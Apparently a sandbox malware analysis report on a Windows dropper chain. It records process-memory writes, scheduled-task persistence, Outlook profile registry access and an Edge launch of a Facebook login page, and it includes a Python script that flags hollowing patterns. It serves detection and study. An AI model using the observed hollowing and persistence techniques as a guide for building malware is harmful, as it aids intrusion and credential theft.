Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\138F.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3320 wrote to memory of 3056 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D561.exe
PID 3320 wrote to memory of 3056 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D561.exe
PID 3320 wrote to memory of 3056 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D561.exe
PID 3320 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D61D.exe
PID 3320 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D61D.exe
PID 3320 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D61D.exe
PID 3056 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\D561.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 3056 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\D561.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 3056 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\D561.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 448 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 448 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 448 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 1720 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 1720 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 1720 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 3320 wrote to memory of 2408 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3320 wrote to memory of 2408 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2928 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2928 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2928 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 3604 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 3604 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 3604 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 3320 wrote to memory of 2100 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D9D8.exe
PID 3320 wrote to memory of 2100 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D9D8.exe
PID 3320 wrote to memory of 2100 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D9D8.exe
PID 3320 wrote to memory of 4812 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DA56.exe
PID 3320 wrote to memory of 4812 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DA56.exe
PID 3320 wrote to memory of 4812 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DA56.exe
PID 3320 wrote to memory of 2768 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DB23.exe
PID 3320 wrote to memory of 2768 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DB23.exe
PID 3320 wrote to memory of 2768 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DB23.exe
PID 2408 wrote to memory of 4564 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2408 wrote to memory of 4564 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3320 wrote to memory of 552 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DD37.exe
PID 3320 wrote to memory of 552 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DD37.exe
PID 3320 wrote to memory of 552 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DD37.exe
PID 2768 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\DB23.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2768 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\DB23.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2768 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\DB23.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4564 wrote to memory of 3048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4564 wrote to memory of 3048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3604 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe
PID 3604 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe
PID 3604 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe
PID 1760 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 1760 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 1760 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 1760 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1760 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1760 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4564 wrote to memory of 4900 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4564 wrote to memory of 4900 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4564 wrote to memory of 4900 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
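
The table above prints one row per WriteProcessMemory call, so the same writer/target pair repeats and the interesting pairs are easy to miss: Explorer.EXE writing into freshly dropped executables under %TEMP%, the nested IXP00n.TMP dropper chain, and 1iH26Lb2.exe writing ten times into the .NET host AppLaunch.exe where every plain spawn in the table shows only two or three writes (the WerFault.exe -p 3428 entries further down show that AppLaunch.exe then crashed). The Python script below is an added example, not part of the sandbox report: it parses rows in exactly the format printed above, counts writes per pair, flags those three patterns and recovers the deepest process chain from Explorer.EXE. The write-count threshold, the list of .NET host binaries and the path heuristics are assumptions of this example, not something the report states.

```python
import re
from collections import Counter, defaultdict

# Rows copied from the WriteProcessMemory table above, each with the number of
# identical rows the report shows, expanded back into the one-row-per-call
# layout the sandbox prints. Constructed input for this added example.
SAMPLE_ROWS = "\n".join(row for row, n in [
    (r"PID 3320 wrote to memory of 3056 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D561.exe", 3),
    (r"PID 3056 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\D561.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe", 3),
    (r"PID 448 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe", 3),
    (r"PID 1720 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe", 3),
    (r"PID 2928 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe", 3),
    (r"PID 3604 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe", 3),
    (r"PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe", 10),
    (r"PID 3320 wrote to memory of 2408 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe", 2),
    (r"PID 2408 wrote to memory of 4564 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", 2),
    (r"PID 3320 wrote to memory of 2768 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DB23.exe", 3),
    (r"PID 2768 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\DB23.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe", 3),
    (r"PID 1760 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe", 3),
] for _ in range(n))

# One table row: "PID <src> wrote to memory of <dst> N/A <writer image> <target image>".
# Image paths may contain spaces, so the writer image is matched non-greedily up
# to the next drive-letter prefix in the row.
ROW_RE = re.compile(
    r"^PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) N/A "
    r"(?P<src_img>[A-Za-z]:\\.*?) (?P<dst_img>[A-Za-z]:\\.*)$"
)

# Assumptions of this example, not statements of the report.
DOTNET_HOSTS = {"applaunch.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe"}
TEMP_MARKER = "\\appdata\\local\\temp\\"


def parse_rows(text):
    """Return one (src_pid, dst_pid, src_image, dst_image) tuple per table row."""
    edges = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            edges.append((int(m["src"]), int(m["dst"]), m["src_img"], m["dst_img"]))
    return edges


def basename(path):
    # rsplit on the backslash rather than os.path so this also works on non-Windows hosts
    return path.rsplit("\\", 1)[-1].lower()


def analyze(text, spawn_writes=3):
    """Group rows per writer/target pair and flag the pairs worth a closer look.

    spawn_writes is the most writes a plain process spawn produced in this
    report (two or three per pair); a pair with more received additional
    code or data after creation, as 1iH26Lb2.exe -> AppLaunch.exe did.
    """
    findings = []
    for (src, dst, src_img, dst_img), n in Counter(parse_rows(text)).items():
        reasons = []
        if basename(src_img) == "explorer.exe" and TEMP_MARKER in dst_img.lower():
            reasons.append("explorer.exe wrote into an executable under %TEMP%")
        if basename(dst_img) in DOTNET_HOSTS and not src_img.lower().startswith("c:\\windows\\"):
            reasons.append("non-Windows binary wrote into a .NET host (hollowing candidate)")
        if n > spawn_writes:
            reasons.append(f"{n} writes, more than the {spawn_writes} of a plain spawn")
        if reasons:
            findings.append({"src": src, "dst": dst, "src_img": src_img,
                             "dst_img": dst_img, "writes": n, "reasons": reasons})
    return findings


def longest_chain(text, root):
    """Follow writer -> target edges from root and return the deepest PID chain."""
    children = defaultdict(set)
    for src, dst, _, _ in parse_rows(text):
        children[src].add(dst)
    best = [root]

    def walk(pid, path, seen):
        nonlocal best
        if len(path) > len(best):
            best = path
        for child in sorted(children[pid]):
            if child not in seen:
                walk(child, path + [child], seen | {child})

    walk(root, [root], {root})
    return best


if __name__ == "__main__":
    for f in analyze(SAMPLE_ROWS):
        print(f"{f['src']} -> {f['dst']} ({f['writes']} writes): {'; '.join(f['reasons'])}")
    chain = longest_chain(SAMPLE_ROWS, 3320)
    print("deepest chain from Explorer.EXE:", " -> ".join(map(str, chain)))
```

On the rows above this flags three pairs (Explorer.EXE into D561.exe and DB23.exe, and 1iH26Lb2.exe into AppLaunch.exe) and recovers the eight-process chain from Explorer.EXE down to AppLaunch.exe. Paste a full table into SAMPLE_ROWS to run it on another report; if your own sandbox instruments process creation with a different number of writes, raise or lower spawn_writes accordingly.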

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe

"C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe"

C:\Users\Admin\AppData\Local\Temp\D561.exe

C:\Users\Admin\AppData\Local\Temp\D561.exe

C:\Users\Admin\AppData\Local\Temp\D61D.exe

C:\Users\Admin\AppData\Local\Temp\D61D.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D8AF.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe

C:\Users\Admin\AppData\Local\Temp\D9D8.exe

C:\Users\Admin\AppData\Local\Temp\D9D8.exe

C:\Users\Admin\AppData\Local\Temp\DA56.exe

C:\Users\Admin\AppData\Local\Temp\DA56.exe

C:\Users\Admin\AppData\Local\Temp\DB23.exe

C:\Users\Admin\AppData\Local\Temp\DB23.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\DD37.exe

C:\Users\Admin\AppData\Local\Temp\DD37.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb024046f8,0x7ffb02404708,0x7ffb02404718

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 540

C:\Windows\SysWOW64\WerFault.exe

